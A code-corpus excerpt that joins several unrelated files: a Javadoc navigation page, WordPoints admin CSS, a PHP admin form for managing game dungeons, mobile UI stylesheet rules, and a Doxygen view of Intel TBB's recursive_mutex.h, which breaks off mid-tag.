HREF="#pt.unl.fct.di.dbc4j.examples"><B>pt.unl.fct.di.dbc4j.examples</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="pt.unl.fct.di.dbc4j.examples"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Uses of <A HREF="../../../../../../../pt/unl/fct/di/dbc4j/examples/Queue.html" title="class in pt.unl.fct.di.dbc4j.examples">Queue</A> in <A HREF="../../../../../../../pt/unl/fct/di/dbc4j/examples/package-summary.html">pt.unl.fct.di.dbc4j.examples</A></FONT></TH> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left" COLSPAN="2">Methods in <A HREF="../../../../../../../pt/unl/fct/di/dbc4j/examples/package-summary.html">pt.unl.fct.di.dbc4j.examples</A> that return <A HREF="../../../../../../../pt/unl/fct/di/dbc4j/examples/Queue.html" title="class in pt.unl.fct.di.dbc4j.examples">Queue</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="../../../../../../../pt/unl/fct/di/dbc4j/examples/Queue.html" title="class in pt.unl.fct.di.dbc4j.examples">Queue</A></CODE></FONT></TD> <TD><CODE><B>Queue.</B><B><A HREF="../../../../../../../pt/unl/fct/di/dbc4j/examples/Queue.html#clone()">clone</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../pt/unl/fct/di/dbc4j/examples/Queue.html" title="class in pt.unl.fct.di.dbc4j.examples"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../../index.html?pt/unl/fct/di/dbc4j/examples//class-useQueue.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="Queue.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> </BODY> </HTML>
src/admin/assets/css/admin.min.css
WordPoints/wordpoints
.wordpoints-notice-dismiss-form{padding-bottom:5px}.wordpoints-settings-help-notice{height:120px;margin-top:50px}.wordpoints-settings-help-notice div{width:48%;float:left}.wordpoints-upload-extension{display:block}.wordpoints-extension-updates-iframe{width:100%;height:100%;min-height:850px}.wordpoints-borderless-frame{border:none}.wordpoints-non-scrolling-frame{overflow:hidden}.spinner.wordpoints-frame-loading-background{width:100%;height:auto;opacity:1}.wordpoints-inline{display:inline}
application/models/AdministratorModel/html/dungeon.html
tfowler4/stage
<div class="col-md-4"> <div class="panel panel-primary"> <div class="panel-heading">Create A New Dungeon</div> <div class="panel-body"> <form class="form-horizontal" role="form" method="POST" action="<?php echo PAGE_ADMIN; ?>" autocomplete="off" enctype="multipart/form-data"> <div class="form-group"> <label for="" class="control-label col-lg-3 col-md-2">Dungeon</label> <div class="col-lg-8 col-md-10"> <input type="text" name="adminpanel-dungeon" class="form-control" placeholder="Enter Dungeon Name"> </div> </div> <div class="form-group"> <label for="" class="control-label col-lg-3 col-md-2">Abbreviation</label> <div class="col-lg-8 col-md-10"> <input name="adminpanel-dungeon-abbreviation" class="form-control" placeholder="Enter Dungeon Abbreviation"> </div> </div> <div class="form-group"> <label for="" class="control-label col-lg-3 col-md-2">Tier Name</label> <div class="col-lg-8 col-md-10"> <select name="adminpanel-dungeon-tier" class="form-control"> <?php foreach( CommonDataContainer::$tierArray as $tier => $tierDetails ): ?> <option value="<?php echo $tierDetails->_tier; ?>"><?php echo $tier . ' - ' . $tierDetails->_name; ?></option> <?php endforeach; ?> </select> </div> </div> <div class="form-group"> <label for="" class="control-label col-lg-3 col-md-2">Raid Size</label> <div class="col-lg-8 col-md-10"> <select name="adminpanel-dungeon-players" class="form-control"> <?php foreach ( unserialize (RAID_SIZES) as $raidSize ): ?> <option value="<?php echo $raidSize; ?>"><?php echo $raidSize . '-Man'; ?></option> <?php endforeach; ?> </select> </div> </div> <div class="form-group"> <label for="" class="control-label col-lg-3 col-md-2">Start Date</label> <div class="form-inline col-lg-8 col-md-10"> <select name="adminpanel-tier-launch-month" class="form-control"> <?php foreach( CommonDataContainer::$monthsArray as $month => $monthValue): ?> <?php if ( $month == date('m') ): ?> <option value="<?php echo $month; ?>" selected><?php echo $monthValue; ?></option> <?php else: ?> <option value="<?php echo $month; ?>"><?php echo $monthValue; ?></option> <?php endif; ?> <?php endforeach; ?> </select> <select name="adminpanel-tier-launch-day" class="form-control"> <?php foreach( CommonDataContainer::$daysArray as $day => $dayValue): ?> <?php if ( $day == date('d') ): ?> <option value="<?php echo $day; ?>" selected><?php echo $dayValue; ?></option> <?php else: ?> <option value="<?php echo $day; ?>"><?php echo $dayValue; ?></option> <?php endif; ?> <?php endforeach; ?> </select> <select name="adminpanel-tier-launch-year" class="form-control"> <?php foreach( CommonDataContainer::$yearsArray as $year => $yearValue): ?> <?php if ( $year == date('Y') ): ?> <option value="<?php echo $year; ?>" selected><?php echo $yearValue; ?></option> <?php else: ?> <option value="<?php echo $year; ?>"><?php echo $yearValue; ?></option> <?php endif; ?> <?php endforeach; ?> </select> </div> </div> <div class="form-group"> <label for="" class="control-label col-lg-3 col-md-2">Type</label> <div class="col-lg-8 col-md-10"> <select name="adminpanel-dungeon-type" class="form-control"> <?php foreach ( unserialize (DUNGEON_TYPES) as $typeId => $type ): ?> <option value="<?php echo $typeId; ?>"><?php echo $typeId . ' - ' .$type; ?></option> <?php endforeach; ?> </select> </div> </div> <div class="form-group"> <div class="text-center"> <input type="hidden" name="form-type" value="dungeon-admin"> <input type="hidden" name="active" value="Active"> <button type="submit" name="action" class="btn btn-default" value="dungeon-add"> <span class="glyphicon glyphicon-plus"></span> Create Dungeon </button> </div> </div> </form> </div> </div> </div> <div class="col-md-4"> <div class="panel panel-primary"> <div class="panel-heading">Edit Dungeon Details</div> <div class="panel-body"> <form class="form-horizontal" role="form" method="POST" action="<?php echo PAGE_ADMIN; ?>" autocomplete="off" enctype="multipart/form-data"> <div class="form-group"> <label for="" class="control-label col-lg-3 col-md-2">Dungeon</label> <div class="col-lg-8 col-md-10"> <select name="adminpanel-dungeon" id="dungeon-edit-select" class="form-control"> <option value="">Select Dungeon</option> <?php foreach( CommonDataContainer::$dungeonArray as $dungeonId => $dungeonDetails ): ?> <option value="<?php echo $dungeonId; ?>"><?php echo $dungeonDetails->_name; ?></option> <?php endforeach; ?> </select> </div> </div> <div id="dungeon-edit-content"></div> <div class="form-group"> <div class="text-center"> <input type="hidden" name="form-type" value="dungeon-admin"> <input type="hidden" name="active" value="Active"> <button type="submit" name="action" class="btn btn-default" value="dungeon-edit"> <span class="glyphicon glyphicon-ok"></span> Edit Dungeon Details </button> </div> </div> </form> </div> </div> </div> <div class="col-md-4"> <div class="panel panel-primary"> <div class="panel-heading">Remove Existing Dungeon</div> <div class="panel-body"> <form class="form-horizontal" role="form" method="POST" action="<?php echo PAGE_ADMIN; ?>" autocomplete="off" enctype="multipart/form-data"> <div class="form-group"> <label for="" class="control-label col-lg-3 col-md-2">Dungeon</label> <div class="col-lg-8 col-md-10"> <select name="adminpanel-dungeon" class="form-control"> <option value="">Select Dungeon</option> <?php foreach( CommonDataContainer::$dungeonArray as $dungeonId => $dungeonDetails ): ?> <option value="<?php echo $dungeonId; ?>"><?php echo $dungeonDetails->_name; ?></option> <?php endforeach; ?> </select> </div> </div> <div class="form-group"> <div class="text-center"> <input type="hidden" name="form-type" value="dungeon-admin"> <input type="hidden" name="active" value="Active"> <button type="submit" name="action" class="btn btn-default" value="dungeon-remove"> <span class="glyphicon glyphicon-remove"></span> Remove Dungeon </button> </div> </div> </form> </div> </div> </div>
js/style.css
chenshiming0802/fakeui_weixin_for_jqmobi_hybird
/*ajust jqmobi*/ #afui .panel{ margin: 0px; padding: 0px; } #afui .footer{ margin: 0px; padding: 0px; height:54px; } #afui .footer.no{ height: 0px; background-color: red; } #afui .afScrollPanel{ background-color: #ebebeb;/*背景颜色 gc_b*/ } /*sprcore ui------------------------------------------------------*/ *{ margin: 0px; padding: 0px; background-color: #ffffff;/*前台颜色 gc_f*/ border: 0px; text-align: left; } a,u{text-decoration:none;} ul li{list-style-type:none;} .clear{clear: both;} .spr_header{ background-color: #000000; height: 100%; color:#ffffff; position: relative; height:48px; }/*header div*/ .spr_header .spr_title, .spr_header .spr_buttons { background-color: #000000; position: absolute; top:16px; } .spr_header .spr_title{ font-weight: bold; font-size: 17px; left: 16px; } .spr_header .spr_title i{ font-size: 20px; color:#ffffff; text-shadow: 0 1px 0 #999999 ; background-color: #000000; } .spr_header .spr_buttons{ right: 20px; } .spr_header .spr_buttons i{ font-size: 20px; padding-left: 35px; color:#ffffff; text-shadow: 0 1px 0 #999999 ; background-color: #000000; } .spr_footer{ height:54px; } /*margin padding:li div u*/ .pa_h17{padding-left:17px;padding-right:17px;} .pa_h6{padding-left:6px;padding-right:6px;} .pa_h11{padding-left:11px;padding-right:11px;} .pa_v7{padding-top:7px;padding-bottom:7px;} .pa_v5{padding-top:5px;padding-bottom:5px;} .pa_v12{padding-top:12px;padding-bottom:12px;} .pa_t7{padding-top:7px;} .pa_t5{padding-top:5px;} .pa_t10{padding-top:10px;} .pa_t10{padding-top:10px;} .pa_r70{margin-right:70px} .ma_l11{margin-left:11px} .ma_r11{margin-right:11px} .ma_h17{margin-left:17px;margin-right:17px;} /*buttom line : li div*/ .li_b1{border-bottom: 1px solid;} .li_t1{border-top: 1px solid;} .li_a1{border: 1px solid;} /*zone height/width :div img*/ .he_119{height: 119px;} .he_80{height: 80px;} .he_64{height: 64px;} .he_63{height: 63px;} .he_60{height: 60px;} .he_49{height: 49px;} .he_47{height: 47px;} .he_44{height: 44px;} .he_37{height: 37px;} .he_24{height: 24px;} .he_20{height: 20px;} .he_26{height: 26px;} .he_0{height: 0px;} .wi_276{width:276px;} .wi_64{width:64px;} .wi_49{width:49px;} .wi_44{width:44px;} .wi_37{width:37px;} .wi_24{width:24px;} .lh_24{line-height: 24px;} /*font style:p u */ .h15{font-size: 15px;font-weight: bold;} .p11{font-size: 11px;} .p13{font-size: 13px;} .p26{font-size: 26px;} /*absolute:div; */ .ab_r12{right:12px;position: absolute;} .ab_r7{right:7px;position: absolute;} .ab_t12{top:12px;position: absolute;} .ab_t7{top:7px;position: absolute;} .ab_t2{top:2px;position: absolute;} .ab_t11{top:11px;position: absolute;} .ab_t13{top:13px;position: absolute;} .ab_t15{top:15px;position: absolute;} .ab_t20{top:20px;position: absolute;} .ab_t45{top:45px;position: absolute;} .ab_l50{left:50px;position: absolute;} .ab_l12{left:12px;position: absolute;} .ab_l16{left:16px;position: absolute;} .ab_l25{left:25px;position: absolute;} .ab_l65{left:65px;position: absolute;} .ab_l93{left:93px;position: absolute;} .ab_l105{left:105px;position: absolute;} /*relative:div */ /*.re_t-2{top:-2px;position: relative;} */ /*color r*/ .gc_b{background-color:#ebebeb;}/*background color*/ .gc_f{background-color:#ffffff;}/*foreground color*/ .gc_b2{background-color:#d3d3d3;}/*background color 第一种背景色*/ .co_h{color:#336666;text-shadow: 0 1px 0 #b8b8b8 ;} .co_p{color:#b5b5b5;text-shadow: 0 1px 0 #b5b5b5 ;} .co_p2{color:#f7f7f7;text-shadow: 0 1px 0 #dfdfdf ;} .co_pr{color:#45c01a;text-shadow: 0 1px 0 #bde7ae ;} .bc_h{border-color:#336666;} .bc_p{border-color:#CCCCCC;} /*display*/ .di_i{display: inline} .ra_5{-moz-border-radius: 5px; -webkit-border-radius: 5px; border-radius: 5px; } .center{text-align: center;} /*horizontal 排列*/ ul.h li{float:left;} ul.center li{text-align: center;} ul.wi_s14 li{width:25%;} /*div*/ .fl_l{float:left;} /*float*/ .po_r{position: relative;} .spr_list li{position:relative;} .budgets { width: 19px; height: 19px; line-height: 19px; background: red; -moz-border-radius: 50px; -webkit-border-radius: 50px; border-radius: 50px; text-align: center; color:#ffffff; font-weight: bold; font-size: 11px; text-shadow: 0 1px 0 #FF6666; } .no{display:none;} /*app------------------------------------------------------*/
doc/html/a00432.html
dusek/tbb
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1"> <title>recursive_mutex.h Source File</title> <link href="doxygen.css" rel="stylesheet" type="text/css"> <link href="tabs.css" rel="stylesheet" type="text/css"> </head><body> <!-- Generated by Doxygen 1.4.7 --> <div class="tabs"> <ul> <li><a href="index.html"><span>Main&nbsp;Page</span></a></li> <li><a href="modules.html"><span>Modules</span></a></li> <li><a href="namespaces.html"><span>Namespaces</span></a></li> <li><a href="annotated.html"><span>Classes</span></a></li> <li id="current"><a href="files.html"><span>Files</span></a></li> <li><a href="pages.html"><span>Related&nbsp;Pages</span></a></li> </ul></div> <div class="tabs"> <ul> <li><a href="files.html"><span>File&nbsp;List</span></a></li> <li><a href="globals.html"><span>File&nbsp;Members</span></a></li> </ul></div> <h1>recursive_mutex.h</h1><div class="fragment"><pre class="fragment"><a name="l00001"></a>00001 <span class="comment">/*</span> <a name="l00002"></a>00002 <span class="comment"> Copyright 2005-2010 Intel Corporation. All Rights Reserved.</span> <a name="l00003"></a>00003 <span class="comment"></span> <a name="l00004"></a>00004 <span class="comment"> The source code contained or described herein and all documents related</span> <a name="l00005"></a>00005 <span class="comment"> to the source code ("Material") are owned by Intel Corporation or its</span> <a name="l00006"></a>00006 <span class="comment"> suppliers or licensors. Title to the Material remains with Intel</span> <a name="l00007"></a>00007 <span class="comment"> Corporation or its suppliers and licensors. The Material is protected</span> <a name="l00008"></a>00008 <span class="comment"> by worldwide copyright laws and treaty provisions. No part of the</span> <a name="l00009"></a>00009 <span class="comment"> Material may be used, copied, reproduced, modified, published, uploaded,</span> <a name="l00010"></a>00010 <span class="comment"> posted, transmitted, distributed, or disclosed in any way without</span> <a name="l00011"></a>00011 <span class="comment"> Intel's prior express written permission.</span> <a name="l00012"></a>00012 <span class="comment"></span> <a name="l00013"></a>00013 <span class="comment"> No license under any patent, copyright, trade secret or other</span> <a name="l00014"></a>00014 <span class="comment"> intellectual property right is granted to or conferred upon you by</span> <a name="l00015"></a>00015 <span class="comment"> disclosure or delivery of the Materials, either expressly, by</span> <a name="l00016"></a>00016 <span class="comment"> implication, inducement, estoppel or otherwise. Any license under such</span> <a name="l00017"></a>00017 <span class="comment"> intellectual property rights must be express and approved by Intel in</span> <a name="l00018"></a>00018 <span class="comment"> writing.</span> <a name="l00019"></a>00019 <span class="comment">*/</span> <a name="l00020"></a>00020 <a name="l00021"></a>00021 <span class="preprocessor">#ifndef __TBB_recursive_mutex_H</span> <a name="l00022"></a>00022 <span class="preprocessor"></span><span class="preprocessor">#define __TBB_recursive_mutex_H</span> <a name="l00023"></a>00023 <span class="preprocessor"></span> <a name="l00024"></a>00024 <span class="preprocessor">#if _WIN32||_WIN64</span> <a name="l00025"></a>00025 <span class="preprocessor"></span><span class="preprocessor"> #include &lt;windows.h&gt;</span> <a name="l00026"></a>00026 <span class="preprocessor"> #if !defined(_WIN32_WINNT)</span> <a name="l00027"></a>00027 <span class="preprocessor"></span> <span class="comment">// The following Windows API function is declared explicitly;</span> <a name="l00028"></a>00028 <span class="comment">// otherwise any user would have to specify /D_WIN32_WINNT=0x0400</span> <a name="l00029"></a>00029 <span class="keyword">extern</span> <span class="stringliteral">"C"</span> BOOL WINAPI TryEnterCriticalSection( LPCRITICAL_SECTION ); <a name="l00030"></a>00030 <span class="preprocessor"> #endif</span> <a name="l00031"></a>00031 <span class="preprocessor"></span><span class="preprocessor">#else </span><span class="comment">/* if not _WIN32||_WIN64 */</span> <a name="l00032"></a>00032 <span class="preprocessor"> #include &lt;pthread.h&gt;</span> <a name="l00033"></a>00033 <span class="preprocessor">#endif </span><span class="comment">/* _WIN32||_WIN64 */</span> <a name="l00034"></a>00034 <a name="l00035"></a>00035 <span class="preprocessor">#include &lt;new&gt;</span> <a name="l00036"></a>00036 <span class="preprocessor">#include "aligned_space.h"</span> <a name="l00037"></a>00037 <span class="preprocessor">#include "tbb_stddef.h"</span> <a name="l00038"></a>00038 <span class="preprocessor">#include "tbb_profiling.h"</span> <a name="l00039"></a>00039 <a name="l00040"></a>00040 <span class="keyword">namespace </span>tbb { <a name="l00042"></a>00042 <a name="l00044"></a><a class="code" href="a00192.html">00044</a> <span class="keyword">class </span><a class="code" href="a00192.html">recursive_mutex</a> { <a name="l00045"></a>00045 <span class="keyword">public</span>: <a name="l00047"></a><a class="code" href="a00192.html#d2fceb7f95c24a8cd1457d4527e4b8c6">00047</a> <a class="code" href="a00192.html#d2fceb7f95c24a8cd1457d4527e4b8c6">recursive_mutex</a>() { <a name="l00048"></a>00048 <span class="preprocessor">#if TBB_USE_ASSERT || TBB_USE_THREADING_TOOLS</span> <a name="l00049"></a>00049 <span class="preprocessor"></span> internal_construct(); <a name="l00050"></a>00050 <span class="preprocessor">#else</span> <a name="l00051"></a>00051 <span class="preprocessor"></span><span class="preprocessor"> #if _WIN32||_WIN64</span> <a name="l00052"></a>00052 <span class="preprocessor"></span> InitializeCriticalSection(&amp;impl); <a name="l00053"></a>00053 <span class="preprocessor"> #else</span> <a name="l00054"></a>00054 <span class="preprocessor"></span> pthread_mutexattr_t mtx_attr; <a name="l00055"></a>00055 <span class="keywordtype">int</span> error_code = pthread_mutexattr_init( &amp;mtx_attr ); <a name="l00056"></a>00056 <span class="keywordflow">if</span>( error_code ) <a name="l00057"></a>00057 tbb::internal::handle_perror(error_code,<span class="stringliteral">"recursive_mutex: pthread_mutexattr_init failed"</span>); <a name="l00058"></a>00058 <a name="l00059"></a>00059 pthread_mutexattr_settype( &amp;mtx_attr, PTHREAD_MUTEX_RECURSIVE ); <a name="l00060"></a>00060 error_code = pthread_mutex_init( &amp;impl, &amp;mtx_attr ); <a name="l00061"></a>00061 <span class="keywordflow">if</span>( error_code ) <a name="l00062"></a>00062 tbb::internal::handle_perror(error_code,<span class="stringliteral">"recursive_mutex: pthread_mutex_init failed"</span>); <a name="l00063"></a>00063 <a name="l00064"></a>00064 pthread_mutexattr_destroy( &amp;mtx_attr ); <a name="l00065"></a>00065 <span class="preprocessor"> #endif </span><span class="comment">/* _WIN32||_WIN64*/</span> <a name="l00066"></a>00066 <span class="preprocessor">#endif </span><span class="comment">/* TBB_USE_ASSERT */</span> <a name="l00067"></a>00067 }; <a name="l00068"></a>00068 <a name="l00069"></a>00069 ~<a class="code" href="a00192.html">recursive_mutex</a>() { <a name="l00070"></a>00070 <span class="preprocessor">#if TBB_USE_ASSERT</span> <a name="l00071"></a>00071 <span class="preprocessor"></span> internal_destroy(); <a name="l00072"></a>00072 <span class="preprocessor">#else</span> <a name="l00073"></a>00073 <span class="preprocessor"></span><span class="preprocessor"> #if _WIN32||_WIN64</span> <a name="l00074"></a>00074 <span class="preprocessor"></span> DeleteCriticalSection(&amp;impl); <a name="l00075"></a>00075 <span class="preprocessor"> #else</span> <a name="l00076"></a>00076 <span class="preprocessor"></span> pthread_mutex_destroy(&amp;impl); <a name="l00077"></a>00077 <a name="l00078"></a>00078 <span class="preprocessor"> #endif </span><span class="comment">/* _WIN32||_WIN64 */</span> <a name="l00079"></a>00079 <span class="preprocessor">#endif </span><span class="comment">/* TBB_USE_ASSERT */</span> <a name="l00080"></a>00080 }; <a name="l00081"></a>00081 <a name="l00082"></a>00082 <span class="keyword">class </span>scoped_lock; <a name="l00083"></a>00083 <span class="keyword">friend</span> <span class="keyword">class </span>scoped_lock; <a name="l00084"></a>00084 <a name="l00086"></a>00086 <a name="l00088"></a><a class="code" href="a00193.html">00088</a> <span class="keyword">class </span><a class="code" href="a00193.html">scoped_lock</a>: internal::no_copy { <a name="l00089"></a>00089 <span class="keyword">public</span>: <a name="l00091"></a><a class="code" href="a00193.html#d82d4d36fbf9727a493d26ae50855fe7">00091</a> <a class="code" href="a00193.html#d82d4d36fbf9727a493d26ae50855fe7">scoped_lock</a>() : my_mutex(NULL) {}; <a name="l00092"></a>00092 <a name="l00094"></a><a class="code" href="a00193.html#dec17713c4c1321ac8fec66816d0c602">00094</a> <a class="code" href="a00193.html#d82d4d36fbf9727a493d26ae50855fe7">scoped_lock</a>( <a class="code" href="a00192.html">recursive_mutex</a>&amp; <a class="code" href="a00175.html">mutex</a> ) { <a name="l00095"></a>00095 <span class="preprocessor">#if TBB_USE_ASSERT</span> <a name="l00096"></a>00096 <span class="preprocessor"></span> my_mutex = &amp;mutex; <a name="l00097"></a>00097 <span class="preprocessor">#endif </span><span class="comment">/* TBB_USE_ASSERT */</span> <a name="l00098"></a>00098 <a class="code" href="a00193.html#7fb04da37cccf8c99b1f9102d9074f9a">acquire</a>( mutex ); <a name="l00099"></a>00099 } <a name="l00100"></a>00100 <a name="l00102"></a><a class="code" href="a00193.html#c1197ffb8f3cd9d4fed71d7e06265b7c">00102</a> <a class="code" href="a00193.html#c1197ffb8f3cd9d4fed71d7e06265b7c">~scoped_lock</a>() { <a name="l00103"></a>00103 <span class="keywordflow">if</span>( my_mutex ) <a name="l00104"></a>00104 <a class="code" href="a00193.html#ac480ea0e9d5ea0345a67d57008b6263">release</a>(); <a name="l00105"></a>00105 } <a name="l00106"></a>00106 <a name="l00108"></a><a class="code" href="a00193.html#7fb04da37cccf8c99b1f9102d9074f9a">00108</a> <span class="keywordtype">void</span> <a class="code" href="a00193.html#7fb04da37cccf8c99b1f9102d9074f9a">acquire</a>( <a class="code" href="a00192.html">recursive_mutex</a>&amp; <a class="code" href="a00175.html">mutex</a> ) { <a name="l00109"></a>00109 <span class="preprocessor">#if TBB_USE_ASSERT</span> <a name="l00110"></a>00110 <span class="preprocessor"></span> internal_acquire( mutex ); <a name="l00111"></a>00111 <span class="preprocessor">#else</span> <a name="l00112"></a>00112 <span class="preprocessor"></span> my_mutex = &amp;mutex; <a name="l00113"></a>00113 mutex.<a class="code" href="a00192.html#4c342c69d47f4bb0b393535dee4015d6">lock</a>(); <a name="l00114"></a>00114 <span class="preprocessor">#endif </span><span class="comment">/* TBB_USE_ASSERT */</span> <a name="l00115"></a>00115 } <a name="l00116"></a>00116 <a name="l00118"></a><a class="code" href="a00193.html#36bfc3e93e3ef6340abef4901444d340">00118</a> <span class="keywordtype">bool</span> <a class="code" href="a00193.html#36bfc3e93e3ef6340abef4901444d340">try_acquire</a>( <a class="code" href="a00192.html">recursive_mutex</a>&amp; <a class="code" href="a00175.html">mutex</a> ) { <a name="l00119"></a>00119 <span class="preprocessor">#if TBB_USE_ASSERT</span> <a name="l00120"></a>00120 <span class="preprocessor"></span> <span class="keywordflow">return</span> internal_try_acquire( mutex ); <a name="l00121"></a>00121 <span class="preprocessor">#else</span> <a name="l00122"></a>00122 <span class="preprocessor"></span> <span class="keywordtype">bool</span> result = mutex.<a class="code" href="a00192.html#86e719b0afee25704af11ab97694d240">try_lock</a>(); <a name="l00123"></a>00123 <span class="keywordflow">if</span>( result ) <a name="l00124"></a>00124 my_mutex = &amp;mutex; <a name="l00125"></a>00125 <span class="keywordflow">return</span> result; <a name="l00126"></a>00126 <span class="preprocessor">#endif </span><span class="comment">/* TBB_USE_ASSERT */</span> <a name="l00127"></a>00127 } <a name="l00128"></a>00128 <a name="l00130"></a><a class="code" href="a00193.html#ac480ea0e9d5ea0345a67d57008b6263">00130</a> <span class="keywordtype">void</span> <a class="code" href="a00193.html#ac480ea0e9d5ea0345a67d57008b6263">release</a>() { <a name="l00131"></a>00131 <span class="preprocessor">#if TBB_USE_ASSERT</span> <a name="l00132"></a>00132 <span class="preprocessor"></span> internal_release(); <a name="l00133"></a>00133 <span class="preprocessor">#else</span> <a name="l00134"></a>00134 <span class="preprocessor"></span> my_mutex-&gt;<a class="code" href="a00192.html#f0a96e26b7f074588dc31e32524856ae">unlock</a>(); <a name="l00135"></a>00135 my_mutex = NULL; <a name="l00136"></a>00136 <span class="preprocessor">#endif </span><span class="comment">/* TBB_USE_ASSERT */</span> <a name="l00137"></a>00137 } <a name="l00138"></a>00138 <a name="l00139"></a>00139 <span class="keyword">private</span>: <a name="l00141"></a>00141 <a class="code" href="a00192.html">recursive_mutex</a>* my_mutex; <a name="l00142"></a>00142 <a name="l00144"></a>00144 <span class="keywordtype">void</span> __TBB_EXPORTED_METHOD internal_acquire( <a class="code" href="a00192.html">recursive_mutex</a>&amp; m ); <a name="l00145"></a>00145 <a name="l00147"></a>00147 <span class="keywordtype">bool</span> __TBB_EXPORTED_METHOD internal_try_acquire( <a class="code" href="a00192.html">recursive_mutex</a>&amp; m ); <a name="l00148"></a>00148 <a name="l00150"></a>00150 <span class="keywordtype">void</span> __TBB_EXPORTED_METHOD internal_release(); <a name="l00151"></a>00151 <a name="l00152"></a>00152 <span class="keyword">friend</span> <span class="keyword">class </span><a class="code" href="a00192.html">recursive_mutex</a>; <a name="l00153"></a>00153 }; <a name="l00154"></a>00154 <a name="l00155"></a>00155 <span class="comment">// Mutex traits</span> <a name="l00156"></a>00156 <span class="keyword">static</span> <span class="keyword">const</span> <span class="keywordtype">bool</span> is_rw_mutex = <span class="keyword">false</span>; <a name="l00157"></a>00157 <span class="keyword">static</span> <span class="keyword">const</span> <span class="keywordtype">bool</span> is_recursive_mutex = <span class="keyword">true</span>; <a name="l00158"></a>00158 <span class="keyword">static</span> <span class="keyword">const</span> <span class="keywordtype">bool</span> is_fair_mutex = <span class="keyword">false</span>; <a name="l00159"></a>00159 <a name="l00160"></a>00160 <span class="comment">// C++0x compatibility interface</span> <a name="l00161"></a>00161 <a name="l00163"></a><a class="code" href="a00192.html#4c342c69d47f4bb0b393535dee4015d6">00163</a> <span class="keywordtype">void</span> <a class="code" href="a00192.html#4c342c69d47f4bb0b393535dee4015d6">lock</a>() { <a name="l00164"></a>00164 <span class="preprocessor">#if TBB_USE_ASSERT</span> <a name="l00165"></a>00165 <span class="preprocessor"></span> <a class="code" href="a00144.html">aligned_space&lt;scoped_lock,1&gt;</a> tmp; <a name="l00166"></a>00166 <span class="keyword">new</span>(tmp.<a class="code" href="a00144.html#0d702fc6b9e9d061ace3501b3c861cdf">begin</a>()) <a class="code" href="a00193.html">scoped_lock</a>(*<span class="keyword">this</span>); <a name="l00167"></a>00167 <span class="preprocessor">#else</span> <a name="l00168"></a>00168 <span class="preprocessor"></span><span class="preprocessor"> #if _WIN32||_WIN64</span> <a name="l00169"></a>00169 <span class="preprocessor"></span> EnterCriticalSection(&amp;impl); <a name="l00170"></a>00170 <span class="preprocessor"> #else</span> <a name="l00171"></a>00171 <span class="preprocessor"></span> pthread_mutex_lock(&amp;impl); <a name="l00172"></a>00172 <span class="preprocessor"> #endif </span><span class="comment">/* _WIN32||_WIN64 */</span> <a name="l00173"></a>00173 <span 